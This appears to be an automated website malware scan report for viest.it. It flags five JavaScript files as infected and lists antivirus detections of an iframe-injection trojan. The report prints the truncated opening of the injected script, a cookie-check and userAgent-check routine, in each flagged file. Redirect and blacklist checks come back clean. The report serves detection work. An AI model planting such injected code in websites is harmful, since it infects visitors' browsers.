New scan:

Malware Scanner report for viest.it

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/7
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://viest.it/
200 OK
Content-Length: 40895
Content-Type: text/html
clean
http://viest.it/js/modernizr.foundation.js
200 OK
Content-Length: 10336
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Minecopyswetalonecode() {
var expolite = navigator.userAgent;
var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1);
var bob = (getCookie("joombanight
... 3267 bytes are skipped ...
l=1,c(1))},e),i?k.onload():n.parentNode.insertBefore(k,n)},a.yepnope.injectCss=function(a,c,d,e,g,i){var e=b.createElement("link"),j,c=i?h:c||f;e.href=a,e.rel="stylesheet",e.type="text/css";for(j in d)e.setAttribute(j,d[j]);g||(n.parentNode.insertBefore(e,n),m(c,0))}}(this,document),Modernizr.load=function(){yepnope.apply(window,[].slice.call(arguments,0))},Modernizr.addTest("ie8compat",function(){return!window.addEventListener&&document.documentMode&&document.documentMode===7});

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Ikarus
Trojan.JS.IFrame
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
GData
Script.Trojan.Agent.S43RJU
ESET-NOD32
JS/Iframe.JV

http://www.simplebooking.it/search-box-script.axd?IDA=1819
200 OK
Content-Length: 66080
Content-Type: text/javascript
clean
http://viest.it/js/jquery.js
200 OK
Content-Length: 266266
Content-Type: application/javascript
clean
http://viest.it/js/foundation.min.js
200 OK
Content-Length: 160076
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Minecopyswetalonecode() {
var expolite = navigator.userAgent;
var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1);
var bob = (getCookie("joombanight
... 3156 bytes are skipped ...
.top);var r=i+n.threshold>t.data("magellan-top-offset");t.data("magellan-fixed-position")!=r&&(t.data("magellan-fixed-position",r),r?t.css({position:"fixed",top:0}):t.css({position:"",top:""}))})}),e(t).on("scroll.magellan",function(r){var i=e(t).scrollTop();e("[data-magellan-destination]").each(function(){var t=e(this),r=t.attr("data-magellan-destination"),s=t.offset().top-i;s<=n.threshold&&e("[data-magellan-arrival="+r+"]").trigger("magellan.arrival")})})}})(jQuery,this);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Ikarus
Trojan.JS.IFrame
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI

http://viest.it/js/tinynav.min.js
200 OK
Content-Length: 1881
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Minecopyswetalonecode() {
var expolite = navigator.userAgent;
var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1);
var bob = (getCookie("joombanight
... 835 bytes are skipped ...
s("l_"+d).find("a").each(function(){c+='<option value="'+a(this).attr("href")+'">';var b;for(b=0;b<a(this).parents("ul, ol").length-1;b++)c+="- ";c+=a(this).text()+"</option>"});e.append(c);
b.header||e.find(":eq("+a(f+" li").index(a(f+" li."+b.active))+")").attr("selected",!0);e.change(function(){i.location.href=a(this).val()});a(f).after(e);b.label&&e.before(a("<label/>").attr("for",d).addClass("tinynav_label "+d+"_label").append(b.label))}})}})(jQuery,this,0);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Ikarus
Trojan.JS.IFrame
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
GData
Script.Trojan.Agent.274TRT
ESET-NOD32
JS/Iframe.JV

http://viest.it/js/light.js
200 OK
Content-Length: 7302
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Minecopyswetalonecode() {
var expolite = navigator.userAgent;
var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1);
var bob = (getCookie("joombanight
... 3263 bytes are skipped ...
ation|right|hover|while|txtOf|html|arrayPageScroll|_preload_neighbor_images|txtImage|_set_navigation|_show_image_data|title|Date|date|_show_image|intDiffH|containerResizeSpeed|overlayBgColor|ms|attr|hidden|blank|resize|extend|close|opacity|backgroundColor|next|pageXOffset|fn|offsetWidth|scrollWidth|prev|scrollMaxX|visible|fadeOut|toLowerCase|style|fromCharCode|String|DOM_VK_ESCAPE|event|keydown|append|of|ico|000|fast|for||slideDown||100|250|msie|400|browser|animate|lightBox|do'.split('|'),0,{}))

Antivirus reports:

Avast
JS:Iframe-EJO [Trj]
Sophos
Troj/JSRedir-OI

http://viest.it/js/app.js
200 OK
Content-Length: 5471
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Minecopyswetalonecode() {
var expolite = navigator.userAgent;
var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1);
var bob = (getCookie("joombanight
... 4311 bytes are skipped ...
eight = myParent.parent().height();
}

var widthGap = (myWidth > myParentWidth) ? (myWidth - myParentWidth)/2 : (myParentWidth - myWidth)/2;

var heightGap = (myHeight > myParentHeight) ? (myHeight - myParentHeight)/2 : (myParentHeight - myHeight)/2;
me.css({
'margin-top' : -heightGap,
'margin-left': -widthGap
});
}

}
})(jQuery, this);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Iframe-EJO [Trj]
Ikarus
Trojan.JS.IFrame
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
GData
Script.Trojan.Agent.ECTFYB
ESET-NOD32
JS/Iframe.JV

http://www.jscache.com/wejs?wtype=certificateOfExcellence&uniq=660&locationId=202587&lang=it&year=2013
200 OK
Content-Length: 152
Content-Type: application/x-javascript
clean
http://viest.it/home
200 OK
Content-Length: 40883
Content-Type: text/html
clean
http://viest.it/camping-vicenza
200 OK
Content-Length: 41560
Content-Type: text/html
clean
http://viest.it/vicenza_e_dintorni
200 OK
Content-Length: 36244
Content-Type: text/html
clean
http://viest.it/contatti
200 OK
Content-Length: 43024
Content-Type: text/html
clean
http://viest.it/dove_siamo
200 OK
Content-Length: 37372
Content-Type: text/html
clean
http://viest.it/guestbook
200 OK
Content-Length: 37361
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: viest.it

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:05:30 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6h66l7k27devm16bos2sb8h866; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: viest.it
Referer: http://www.google.com/search?q=viest.it

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=viest.it

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://viest.it/

Result: viest.it is not infected or malware details are not published yet.